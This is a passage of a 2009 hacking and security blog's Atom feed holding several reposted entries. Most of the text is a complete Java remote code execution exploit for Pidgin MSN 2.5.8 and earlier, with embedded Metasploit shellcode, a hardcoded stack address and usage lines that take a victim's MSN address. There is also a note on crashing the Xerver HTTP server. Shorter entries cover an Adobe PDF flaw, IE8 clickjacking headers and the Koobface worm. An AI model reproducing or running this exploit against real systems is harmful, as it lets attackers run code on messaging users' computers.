/&gt;&lt;br /&gt;Methods and variables of interest for this attack:&lt;br /&gt;&lt;br /&gt;SubmitForm()&lt;br /&gt;document.myForm.portNR.value="80" # default, any letters here would kill the server&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://milw0rm.com" target="_blank"&gt;milw0rm.com&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5519394898727175132?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5519394898727175132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5519394898727175132'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/12/xerver-http-server-remote-denial-of.html' title='Xerver HTTP Server Remote Denial of Service'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1829283782857570106</id><published>2009-11-01T22:31:00.000+07:00</published><updated>2009-11-01T22:33:54.407+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Virus spreading via PDF</title><content type='html'>Virus writers have created an exploit for an unpatched vulnerability in Adobe Flashplayer, Acrobat and Acrobat reader. The vulnerability exists in these applications on all platforms, Windows, OS X, Linux and Solaris.&lt;br /&gt;&lt;br /&gt;The vulnerable products are:&lt;br /&gt;&lt;br /&gt;    * Adobe Reader 9.1.2 and earlier 9.x versions&lt;br /&gt;    * Adobe Flash Player 9.0.159.0 and 10.0.22.87 and earlier 9.x and 10.x versions&lt;br /&gt;&lt;br /&gt;You can read the alert from Adobe at: http://www.adobe.com/support/security/advisories/apsa09-03.html&lt;br /&gt;&lt;br /&gt;The exploit runs with the privileges of the current user. The known virus is delivered as a PDF file which could be attached to an email or posted on a web page.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;OIT has seen an instance of an infected computer sending email with .PDF attachments. The emails had a message saying the attachment was an e-card or an invoice for a recent purchase. Usual warnings apply, if you weren't expecting an email with an attachment, don't open the PDF attachment. If you don't know the sender, don't open the PDF attachment.&lt;br /&gt;&lt;br /&gt;The malicious PDF contains flash content. In the Windows environment, if the malicious PDF is opened with an Adobe product, it will exploit the vulnerability via the flash player .dll called authplay.dll. On a Windows system, it is apparently possible to disable the connection between Acrobat and Flash by renaming that .dll and one in the same directory called rt3d.dll. This is the only workaround at this time. There are alternate PDF viewers that would not be vulnerable.&lt;br /&gt;&lt;br /&gt;According to malware analysts, the exploit will work on Windows 9x, NT, 2K, XP, Vista, Server 2000 and Server 2003.&lt;br /&gt;&lt;br /&gt;Adobe is working on a patch and says it will be ready for all platforms, but Solaris, on 7/30/09. So until then, use caution when opening that PDF. If you receive a PDF that crashes Acrobat, I'd like to know.&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://oit.ncsu.edu" target="_blank"&gt;oit.ncsu.edu&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1829283782857570106?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1829283782857570106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1829283782857570106'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/11/virus-spreading-via-pdf.html' title='Virus spreading via PDF'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6516533751516280237</id><published>2009-11-01T22:28:00.001+07:00</published><updated>2009-11-01T22:31:36.848+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>IE8  Clickjacking Protection Exposed</title><content type='html'>Yesterday I published a blind analysis of the so called “Clickjacking protection” included in IE8 RC1. “Blind” because, hype aside, there was no technical documentation available, even if the feature was targeted to web developers who — in order to protect their users — should modify the way their pages are served.&lt;br /&gt;&lt;br /&gt;After a while, Microsoft’s David Ross sent me an email confirming that my wild guesses about IE8’s approach, its scope and its limitations were indeed correct. The only information obviously missing from my “prophetic” description was the real name of the “X-I-Do-Not-Want-To-Be-Framed-Across-Domains” HTTP header to be sent before the sensible pages, and today this little mystery has been finally unveiled by Eric Lawrence on the IE Blog:&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;    Web developers can send a HTTP response header named X-FRAME-OPTIONS with HTML pages to restrict how the page may be framed. If the X-FRAME-OPTIONS value contains the token DENY, IE8 will prevent the page from rendering if it will be contained within a frame. If the value contains the token SAMEORIGIN, IE will block rendering only if the origin of the top level-browsing-context is different than the origin of the content containing the X-FRAME-OPTIONS directive. For instance, if http://shop.example.com/confirm.asp contains a DENY directive, that page will not render in a subframe, no matter where the parent frame is located. In contrast, if the X-FRAME-OPTIONS directive contains the SAMEORIGIN token, the page may be framed by any page from the exact http://shop.example.com origin. &lt;br /&gt;&lt;br /&gt;As I had anticipated, IE8’s “clickjacking protection” is just an alternate scriptless way to perform frame busting, a well known and simple technique to prevent a page from being “framed” in another page and therefore becoming an easy UI Redressing target. Microsoft had to follow its own special path because the traditional JavaScript implementation can be easily circumvented on IE, e.g. by loading the targeted page inside an IFRAME SECURITY=restricted element. But the other major browsers are equally “protected” (if we can call “browser protection” something relying on the good will and education of web authors) by “standard” frame busting. Therefore, slogans like “the first browser to counter this type of threat” (James Pratt, Microsoft senior product manager) were marketspeak at its best. Furthermore, this approach is useless against Clickjacking in its original “historical” meaning, i.e. those attacks involving Flash applets and other kinds of plugin embeddings which led Robert “RSnake” Hansen and Jeremiah Grossman to invent the successful buzzword.&lt;br /&gt;&lt;br /&gt;However in my post I had also written that having such a scriptless alternative as a cross-browser option would be nice:&lt;br /&gt;&lt;br /&gt;    I do believe that a declarative approach to control subdocument requests is an excellent idea: otherwise I wouldn’t have included the SUB pseudo-method in ABE Rules Specification (pdf). Moreover, as soon as I’ve got some less blurry info (David Ross, I know you’re listening, why don’t you drop me a line?), I’ll be happy to immediately implement a compatible feature in NoScript and lobby Mozilla for inclusion in Firefox 3.1.&lt;br /&gt;&lt;br /&gt;David kindly answered&lt;br /&gt;&lt;br /&gt;    I think this would be fantastic and it’s a great place to start building some bridges.&lt;br /&gt;&lt;br /&gt;I agree, in facts I’ve filed an enhancement request for Firefox, and I’m already working to release a NoScript development build featuring X-FRAME-OPTIONS support: that’s relatively easy, since I can hook in the work I’m already doing for the ABE module. (Update 2009-29-01: I just released NoScript 1.8.9.9 development build, featuring full experimental X-FRAME-OPTIONS compatibility support).&lt;br /&gt;It’s worth noticing, though, that this is just a cross-browser compatibility effort: neither Firefox nor NoScript really need this feature. Traditional JavaScript-based frame busting works fine in Firefox, giving it the same degree of (modest) “protection” as IE8. NoScript users, on the other hand, are already fully protected, because ClearClick is the one and only countermeasure which works against any type of Clickjacking (frame or embed based), no matter if web sites cooperate or not.&lt;br /&gt;&lt;br /&gt;Speaking of NoScript, I’ve got a small but important correction to the otherwise excellent article Robert McMillan wrote for PC World (IDG News) yesterday:&lt;br /&gt;&lt;br /&gt;    Because clickjacking requires scripting, the attack doesn’t work when NoScript is enabled.&lt;br /&gt;&lt;br /&gt;This statement is wrong twice:&lt;br /&gt;&lt;br /&gt;   1. Clickjacking does not require scripting: JavaScript might make the attacker’s life easier, but it’s not indispensable to throw an attack.&lt;br /&gt;   2. NoScript does not need scripting to be disabled in order to protect its users against Clickjacking: its exclusive ClearClick anti-Clickjacking technology works independently from script blocking.&lt;br /&gt;&lt;br /&gt;That’s why NoScript can be recommended to anyone, even to grandma who’s not inclined to block JavaScript: albeit I do not encourage using NoScript’s “Allow Scripts Globally” command because the default deny policy is your best first-line defense, many additional protection features such as Anti-XSS filters and ClearClick still remain active even when JavaScript is enabled, providing the safest web experience available in any browser.&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://hackademix.net"&gt;hackademix.net&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6516533751516280237?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6516533751516280237'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6516533751516280237'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/11/ie8-clickjacking-protection-exposed.html' title='IE8  Clickjacking Protection Exposed'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5361008893086233323</id><published>2009-11-01T22:11:00.002+07:00</published><updated>2009-11-01T22:28:11.042+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><title type='text'>Pidgin MSN 2.5.8 Remote Code Execution</title><content type='html'>Pidgin MSN &lt;= 2.5.8 Remote Code Execution&lt;br /&gt;&lt;br /&gt;Pierre Nogues - pierz@hotmail.it&lt;br /&gt;&lt;a href="http://www.indahax.com/" target="_blank"&gt;http://www.indahax.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Description:&lt;br /&gt;Pidgin is a multi-protocol Instant Messenger.&lt;br /&gt;&lt;br /&gt;        This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].&lt;br /&gt;The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets&lt;br /&gt;which could lead to memory corruption.&lt;br /&gt;&lt;br /&gt;Affected versions :&lt;br /&gt;Pidgin &lt;= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.&lt;br /&gt;&lt;br /&gt;Plateforms :&lt;br /&gt;   Windows, Linux, Mac&lt;br /&gt;&lt;br /&gt;Fix :&lt;br /&gt;        Fixed in Pidgin 2.5.9&lt;br /&gt;        Update to the latest version : http://www.pidgin.im/download/&lt;br /&gt;&lt;br /&gt;References :&lt;br /&gt;        [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694&lt;br /&gt;        [2] http://www.coresecurity.com/content/libpurple-arbitrary-write&lt;br /&gt;        [3] http://www.pidgin.im/news/security/?id=34&lt;br /&gt;&lt;br /&gt;Usage :&lt;br /&gt;        You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/&lt;br /&gt;       javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java&lt;br /&gt;       java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL&lt;br /&gt;download source code, &lt;a href="http://www.ziddu.com/download/7174565/PidginMSN.zip.html"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;import net.sf.jml.*;&lt;br /&gt;import net.sf.jml.event.*;&lt;br /&gt;import net.sf.jml.impl.*;&lt;br /&gt;import net.sf.jml.message.p2p.*;&lt;br /&gt;import net.sf.jml.util.*;&lt;br /&gt;&lt;br /&gt;public class PidginExploit {&lt;br /&gt;&lt;br /&gt;   private MsnMessenger messenger;&lt;br /&gt;   private String login;&lt;br /&gt;   private String password;&lt;br /&gt;   private String target;&lt;br /&gt;&lt;br /&gt;   private int session_id = NumberUtils.getIntRandom();&lt;br /&gt;&lt;br /&gt;   private byte shellcode[] = new byte[] {&lt;br /&gt;&lt;br /&gt;           /*&lt;br /&gt;            * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !&lt;br /&gt;            * sub esp,500&lt;br /&gt;            */&lt;br /&gt;               (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;           /*&lt;br /&gt;            * windows/exec - 121 bytes&lt;br /&gt;            * http://www.metasploit.com&lt;br /&gt;            * EXITFUNC=process, CMD=calc.exe&lt;br /&gt;            */&lt;br /&gt;               (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,&lt;br /&gt;               (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,&lt;br /&gt;               (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,&lt;br /&gt;               (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,&lt;br /&gt;               (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,&lt;br /&gt;               (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,&lt;br /&gt;               (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,&lt;br /&gt;               (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,&lt;br /&gt;               (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,&lt;br /&gt;               (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,&lt;br /&gt;               (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,&lt;br /&gt;               (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,&lt;br /&gt;               (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,&lt;br /&gt;               (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,&lt;br /&gt;               (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,&lt;br /&gt;               (byte) 0x00&lt;br /&gt;           };&lt;br /&gt;&lt;br /&gt;   // reteip = pointer to the return address in the stack&lt;br /&gt;   // The shellcode will be wrote just before reteip&lt;br /&gt;   // and reteip will automaticly point to the shellcode. It's magic !&lt;br /&gt;   private int reteip = 0x0022CFCC;    //stack on XP SP3-FR Pidgin 2.5.8&lt;br /&gt;&lt;br /&gt;   private int neweip;&lt;br /&gt;   private byte[] payload = new byte[shellcode.length + 4];&lt;br /&gt;   private int totallength = reteip + 4;&lt;br /&gt;&lt;br /&gt;   public static void main(String[] args) throws Exception {&lt;br /&gt;&lt;br /&gt;       if(args.length != 3){&lt;br /&gt;           System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");&lt;br /&gt;       }else{&lt;br /&gt;           PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);&lt;br /&gt;           exploit.start();&lt;br /&gt;       }&lt;br /&gt;&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   public PidginExploit(String login, String password, String target){&lt;br /&gt;       this.login = login;&lt;br /&gt;       this.password = password;&lt;br /&gt;       this.target = target;&lt;br /&gt;&lt;br /&gt;       neweip = reteip - shellcode.length ;&lt;br /&gt;&lt;br /&gt;       for(int i=0;i&lt;shellcode.length;i++)&lt;br /&gt;           payload[i] = shellcode[i];&lt;br /&gt;&lt;br /&gt;       payload[shellcode.length] = (byte)(neweip &amp; 0x000000FF);&lt;br /&gt;       payload[shellcode.length + 1] = (byte)((neweip &amp; 0x0000FF00) &gt;&gt; 8);&lt;br /&gt;       payload[shellcode.length + 2] = (byte)((neweip &amp; 0x00FF0000) &gt;&gt; 16);&lt;br /&gt;       payload[shellcode.length + 3] = (byte)((neweip &amp; 0xFF000000) &gt;&gt; 24);&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   public void start() {&lt;br /&gt;       messenger = MsnMessengerFactory.createMsnMessenger(login,password);&lt;br /&gt;       messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);&lt;br /&gt;&lt;br /&gt;       messenger.setLogIncoming(false);&lt;br /&gt;       messenger.setLogOutgoing(false);&lt;br /&gt;&lt;br /&gt;       initMessenger(messenger);&lt;br /&gt;       messenger.login();&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   protected void initMessenger(MsnMessenger messenger) {&lt;br /&gt;&lt;br /&gt;   messenger.addContactListListener(new MsnContactListAdapter() {&lt;br /&gt;&lt;br /&gt;           public void contactListInitCompleted(MsnMessenger messenger) {&lt;br /&gt;&lt;br /&gt;               final Object id = new Object();&lt;br /&gt;&lt;br /&gt;               messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {&lt;br /&gt;&lt;br /&gt;                   public void switchboardStarted(MsnSwitchboard switchboard) {&lt;br /&gt;&lt;br /&gt;                       if (id != switchboard.getAttachment())&lt;br /&gt;                           return;&lt;br /&gt;&lt;br /&gt;                       switchboard.inviteContact(Email.parseStr(target));&lt;br /&gt;                   }&lt;br /&gt;&lt;br /&gt;                   public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {&lt;br /&gt;                       if (id != switchboard.getAttachment())&lt;br /&gt;                           return;&lt;br /&gt;&lt;br /&gt;                       MsnP2PSlpMessage msg = new MsnP2PSlpMessage();&lt;br /&gt;                       msg.setIdentifier(NumberUtils.getIntRandom());&lt;br /&gt;                       msg.setSessionId(session_id);&lt;br /&gt;                       msg.setOffset(0);&lt;br /&gt;                       msg.setTotalLength(totallength);&lt;br /&gt;                       msg.setCurrentLength(totallength);&lt;br /&gt;&lt;br /&gt;                       // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null&lt;br /&gt;                       // We'll use this buffer to rewrite memory in the stack&lt;br /&gt;                       msg.setFlag(0x1000020);&lt;br /&gt;&lt;br /&gt;                       msg.setP2PDest(target);&lt;br /&gt;&lt;br /&gt;                       switchboard.sendMessage(msg);&lt;br /&gt;&lt;br /&gt;                       System.out.println("First packet sent, waiting for the ACK");&lt;br /&gt;&lt;br /&gt;                   }&lt;br /&gt;&lt;br /&gt;                   public void switchboardClosed(MsnSwitchboard switchboard) {&lt;br /&gt;                       System.out.println("switchboardClosed");&lt;br /&gt;                       switchboard.getMessenger().removeSwitchboardListener(this);&lt;br /&gt;                   }&lt;br /&gt;&lt;br /&gt;                   public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){&lt;br /&gt;                       System.out.println("contactLeaveSwitchboard");&lt;br /&gt;                   }&lt;br /&gt;               });&lt;br /&gt;               messenger.newSwitchboard(id);&lt;br /&gt;           }&lt;br /&gt;       });&lt;br /&gt;&lt;br /&gt;       messenger.addMessageListener(new MsnMessageAdapter(){&lt;br /&gt;&lt;br /&gt;           public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {&lt;br /&gt;&lt;br /&gt;               //We receive the ACK of our first packet with the ID of the new bogus packet&lt;br /&gt;               message.getIdentifier();&lt;br /&gt;&lt;br /&gt;               MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,&lt;br /&gt;                       payload.length, payload, target);&lt;br /&gt;&lt;br /&gt;               switchboard.sendMessage(msg);&lt;br /&gt;               System.out.println("ACK received &amp;&amp; Payload sent !");&lt;br /&gt;               System.out.println("Exploit OK ! CTRL+C to quit");&lt;br /&gt;&lt;br /&gt;           }&lt;br /&gt;       });&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;       messenger.addMessengerListener(new MsnMessengerAdapter() {&lt;br /&gt;&lt;br /&gt;           public void loginCompleted(MsnMessenger messenger) {&lt;br /&gt;               System.out.println(messenger.getOwner().getEmail() + " login");&lt;br /&gt;           }&lt;br /&gt;&lt;br /&gt;           public void logout(MsnMessenger messenger) {&lt;br /&gt;               System.out.println(messenger.getOwner().getEmail() + " logout");&lt;br /&gt;           }&lt;br /&gt;&lt;br /&gt;           public void exceptionCaught(MsnMessenger messenger,&lt;br /&gt;                   Throwable throwable) {&lt;br /&gt;               System.out.println("caught exception: " + throwable);&lt;br /&gt;           }&lt;br /&gt;       });&lt;br /&gt;&lt;br /&gt;   }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;// Original source &lt;a href="http://milw0rm.com" target="_blank"&gt;milw0rm.com&lt;/a&gt; [2009-09-09]&lt;br /&gt;&lt;br /&gt;Need more Computer and Internet security &lt;a href="http://hemlet.tccau.hop.clickbank.net/"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5361008893086233323?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5361008893086233323'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5361008893086233323'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/11/pidgin-msn-258-remote-code-execution.html' title='Pidgin MSN 2.5.8 Remote Code Execution'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3496324820745871174</id><published>2009-09-27T23:04:00.004+07:00</published><updated>2009-09-27T23:08:22.631+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Download'/><title type='text'>Process Explorer v11.33</title><content type='html'>Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.&lt;br /&gt;&lt;br /&gt;The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.&lt;br /&gt;&lt;br /&gt;The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work. Download, &lt;a href="http://www.ziddu.com/download/6670564/ProcessExplorer.zip.html"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;sources. &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" target="_blank"&gt;technet.microsoft.com&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3496324820745871174?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3496324820745871174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3496324820745871174'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/09/process-explorer-v1133.html' title='Process Explorer v11.33'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-8655905215895715719</id><published>2009-09-27T22:53:00.003+07:00</published><updated>2009-09-27T23:01:44.784+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>Facebook Worm Koobface</title><content type='html'>Koobface, the Facebook worm that takes over computers by spreading through the social network, is back in a new form. The newly tweaked Facebook worm works like its predecessor, only with an updated look and code that might not be caught as quickly.&lt;br /&gt;Facebook Worm 2.0&lt;br /&gt;&lt;br /&gt;Koobface tricks you into following a link that looks like it’s from a friend. It’ll usually look like a link to a video of someone you know. Once you open the link, though, you’ll be told you need to download an update to your video player. That update is actually the Facebook worm threat in disguise.&lt;br /&gt;&lt;br /&gt;The new variant, discovered by researchers at Trend Micro, poses as a YouTube page. It’ll even display your name and photo from Facebook to give a nonthreatening appearance to unsuspecting users.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ltm3Etcp4Hw/Sr-LX_OIDKI/AAAAAAAAAA8/rcxMjhmcz1U/s1600-h/facebook-worm.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 212px;" src="http://1.bp.blogspot.com/_Ltm3Etcp4Hw/Sr-LX_OIDKI/AAAAAAAAAA8/rcxMjhmcz1U/s320/facebook-worm.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5386176923582336162" /&gt;&lt;/a&gt;&lt;br /&gt;Facebook-Aided Virus Spread&lt;br /&gt;&lt;br /&gt;Once you agree to install the software it offers, the Koobface worm will take over your computer and hijack your Facebook account. It’ll then live up to its Facebook virus reputation by sending messages to your friends and attempting to infect them.&lt;br /&gt;&lt;br /&gt;“It also sends and receives information from an infected machine by connecting to several servers,” says Trend Micro’s Rik Ferguson. “This allows hackers to execute commands on the affected machine.”&lt;br /&gt;&lt;br /&gt;The new Koobface virus has also been detected on several other social networks, including MySpace, Bebo, Friendster, Hi5, and Live Journal.&lt;br /&gt;Koobface Protection&lt;br /&gt;&lt;br /&gt;Keeping yourself safe from Koobface is simple: Be very cautious of what you click. Even if something appears to have come from a friend, remember that their account could be infected and the message may not actually be from them. Make sure you know where you’re going before you click.&lt;br /&gt;&lt;br /&gt;Once you do follow a link, never install software updates directly from that page. If you receive a notice that you need an update for your Adobe Flash player, navigate directly to adobe.com and look for the update at the original source. That’s the safest way to know you’re getting the real deal, and not a Facebook worm in disguise.&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://www.inquisitr.com/19157/facebook-worm-koobface/"&gt;facebook-worm-koobface/&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-8655905215895715719?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/8655905215895715719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/8655905215895715719'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/09/facebook-worm-koobface.html' title='Facebook Worm Koobface'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Ltm3Etcp4Hw/Sr-LX_OIDKI/AAAAAAAAAA8/rcxMjhmcz1U/s72-c/facebook-worm.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-634476942642998246</id><published>2009-09-27T22:46:00.002+07:00</published><updated>2009-09-27T22:53:40.347+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><title type='text'>Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC</title><content type='html'>FIXES                                                                                &lt;br /&gt;Notepad++ v5.4.5 fixed bugs (from v5.4.4)                                                          &lt;br /&gt;1.  Fix plugins shortcuts not working bug.                                                           &lt;br /&gt;2.  Fix the tooltip on toolbar display bug for the plugins icons.                                  &lt;br /&gt;3.  Fix a crash that was occurring when searching in files from a deep path.                        &lt;br /&gt;4.  Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.&lt;br /&gt;5.  Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml).                      &lt;br /&gt;6.  Add SQL folding capacity.&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://milw0rm.com " target="_blank"&gt;milw0rm.com &lt;/a&gt;  &lt;br /&gt;&lt;br /&gt;download source code, &lt;a 